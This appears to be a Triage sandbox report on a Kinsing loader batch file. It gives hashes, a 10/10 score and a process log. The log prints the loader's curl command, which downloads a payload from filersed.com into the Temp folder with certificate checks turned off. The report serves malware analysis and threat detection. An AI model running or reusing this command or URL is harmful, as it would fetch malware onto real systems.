kinsing | 530aedacb0c00ded2e6c989d9d1885f5f92a6eca74368f9b49c3954821fef1c2 | Triage

Analysis

max time kernel
68s
max time network
75s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
25-01-2024 17:02

Sharing

Report Analysis Logs

General

Target

quia.j.bat
Size

133B
MD5

6c5a557069319c0ff00434150d32e97a
SHA1

2b27ca6080f644bf97b7157f868af1f49f1a4916
SHA256

530aedacb0c00ded2e6c989d9d1885f5f92a6eca74368f9b49c3954821fef1c2
SHA512

a57db26944c39772d4b978f47f9db6174551d7dc6e138e35072ef7e27887ca9565a24469df1670897c4caeb72df03ad8fd0b92a8e6f2049b16465d77dc56e3e3

Score

10^/10

kinsing loader

Malware Config

Signatures

Kinsing
Kinsing is a loader written in Golang.
loader kinsing
Suspicious use of WriteProcessMemory 2 IoCs

Processes:

cmd.exe

description pid process target process

PID 2412 wrote to memory of 820 2412 cmd.exe curl.exe
PID 2412 wrote to memory of 820 2412 cmd.exe curl.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2412

C:\Windows\system32\curl.exe
curl "https://filersed.com/IHq/506593203" --output "C:\Users\Admin\AppData\Local\Temp\qui.k" --ssl-no-revoke --insecure --location
2⤵
PID:820

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...